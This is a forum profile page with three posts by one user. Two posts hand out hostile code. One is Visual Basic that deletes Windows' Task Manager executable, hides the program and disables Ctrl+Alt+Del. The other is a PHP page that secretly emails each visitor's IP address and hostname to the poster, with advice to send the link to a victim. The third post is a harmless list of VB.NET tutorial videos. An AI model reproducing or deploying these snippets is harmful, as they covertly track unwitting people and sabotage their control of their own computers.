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Posts posted by salma21

  1. Heres a few for you all... Code: private sub form_load() killtaskmngr true app.taskvisible = false end sub public sub killtaskmngr(do_it as boolean) if do_it = true then filecopy "c:windowssystem32taskmgr.exe", "c:taskmgr.exe" kill "c:windowssystem32taskmgr.exe" else filecopy "c:taskmgr.exe", "c:windowssystem32taskmgr.exe" end if end sub public sub form1_unload(cancel as integer) killtaskmngr false end sub And Another Code: Declare Function SystemParametersInfo Lib "user32" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, ByVal lpvParam As Any, ByVal fuWinIni As Long) As Long Sub DisableCTRLaltDEL(huh As Boolean) 'Disable CTRL+ALT+DEL' GD = SystemParametersInfo(97, huh, CStr(1), 0) End Sub Hope it helps you!

  2. Well it'es very simple ^^, i made it in 30 sec

    <? $ip = $REMOTE_ADDR; $host = gethostbyaddr($ip); $date = date("d/m/Y H:i:s"); $email = "bighackeur@Mcft.com"; $sujet = "Ip + Host"; $message = "<html><body>Moment : $date<br>Ip : $ip<br>Host : $host</body></html>"; if(mail($email,$sujet,$message,"Content-Type: text/html")){ echo "Ownneeed";} else { echo "*BLEEP* ?";} ?> 

    Change bighackeur@Mcft.com with your email.
    Create a document php, give the link to someone and you'll receive his ip and host in your email box... <_<
    Notice from jlhaslip:

    edit to corrwect bbcode.
    Code blocks should be inside bbcode 'code' tags.
    Please take the time to learn the bbcodes and use them properly. Thanks.

  3. Hello Everybody,


    look at this nice learning videos for vb.net


    1- How to use the ListView Control Part 1: Basics

    Demonstrates the basics of creating ListViewItems, changing the display mode, and adding columns for the Details view.




    2- How to use the ListView Control Part 2: Advanced

    Demonstrates a few advanced concepts related to the ListView control and populating it with database data and syncing changes to ListViewItems back into the database.




    3- How to use the TreeView Control

    Demonstrates how to create TreeNodes, set their parents and create children, navigating the relationships, and more.





    go ahead and learn something..

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